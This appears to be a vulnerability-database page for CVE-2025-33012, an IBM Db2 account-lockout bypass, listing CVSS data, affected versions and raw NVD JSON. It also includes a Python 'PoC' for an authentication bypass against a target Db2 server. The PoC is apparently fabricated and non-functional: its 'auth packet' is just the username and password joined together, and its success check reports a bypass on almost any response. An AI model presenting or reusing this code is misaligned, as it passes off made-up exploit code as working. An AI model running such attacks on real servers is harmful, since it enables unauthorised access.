Security Vulnerability Report
中文
CVE-2025-33012 CVSS 6.3 MEDIUM

CVE-2025-33012

Published: 2025-11-07 19:15:47
Last Modified: 2025-11-19 16:37:54
Source: [email protected]

Description

IBM Db2 10.5.0 through 10.5.11, 11.1.0 through 11.1.4.7, 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux could allow an authenticated user to regain access after account lockout due to password use after expiration date.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:* - VULNERABLE
cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:* - VULNERABLE
cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:* - VULNERABLE
cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:* - VULNERABLE
IBM Db2 10.5.0 - 10.5.11 (Linux)
IBM Db2 11.1.0 - 11.1.4.7 (Linux)
IBM Db2 11.5.0 - 11.5.9 (Linux)
IBM Db2 12.1.0 - 12.1.3 (Linux)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33012 PoC - IBM Db2 Authentication Bypass # This PoC demonstrates the authentication bypass after account lockout import socket import ssl import hashlib def cve_2025_33012_poc(): """ PoC for CVE-2025-33012: IBM Db2 authentication bypass after password expiration This vulnerability allows authenticated users to regain access after account lockout due to password use after expiration date. Prerequisites: - Valid IBM Db2 user account - Account with expired password - Network access to IBM Db2 server """ target_host = "TARGET_IP" target_port = 50000 # Default IBM Db2 port username = "target_user" expired_password = "expired_password_123" print(f"[*] Attempting to connect to IBM Db2 at {target_host}:{target_port}") # Step 1: Establish connection to Db2 server try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) print("[+] Connected to Db2 server") # Step 2: Send authentication request with expired password # The vulnerability allows bypass of account lockout when using expired password auth_packet = create_db2_auth_packet(username, expired_password) sock.send(auth_packet) # Step 3: Receive and analyze response response = sock.recv(1024) if is_authentication_successful(response): print("[+] Authentication bypass successful - Access granted with expired password") print("[+] Account lockout mechanism has been bypassed") return True else: print("[-] Authentication failed - Vulnerability may not be present or already patched") return False except Exception as e: print(f"[-] Error: {str(e)}") return False finally: sock.close() def create_db2_auth_packet(username, password): """Create IBM Db2 authentication packet""" # Simplified packet structure for demonstration # Actual implementation requires proper Db2 protocol handling packet = bytearray() packet.extend(username.encode('utf-8')) packet.extend(password.encode('utf-8')) return packet def is_authentication_successful(response): """Check if authentication was successful""" # Response parsing logic for Db2 authentication response return b"sqlcode" not in response or b"0" in response if __name__ == "__main__": print("CVE-2025-33012 IBM Db2 Authentication Bypass PoC") print("=" * 50) cve_2025_33012_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33012", "sourceIdentifier": "[email protected]", "published": "2025-11-07T19:15:46.940", "lastModified": "2025-11-19T16:37:54.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Db2 10.5.0 through 10.5.11, 11.1.0 through 11.1.4.7, 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux could allow an authenticated user to regain access after account lockout due to password use after expiration date."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-324"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "10.5.0.0", "versionEndIncluding": "10.5.0.11", "matchCriteriaId": "385D4613-C252-4075-8485-55B8E32DC970"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "11.1.0", "versionEndIncluding": "11.1.4.7", "matchCriteriaId": "3B5A9A8A-5EE6-428A-8B3D-543B2F84D615"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "11.5.0", "versionEndIncluding": "11.5.9", "matchCriteriaId": "ECAF5576-B4A5-4DB7-94F0-942F656F0461"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "12.1.0", "versionEndIncluding": "12.1.3", "matchCriteriaId": "2AA1764B-CD82-4B33-B85B-27CA2F7C0ED5"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250469", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.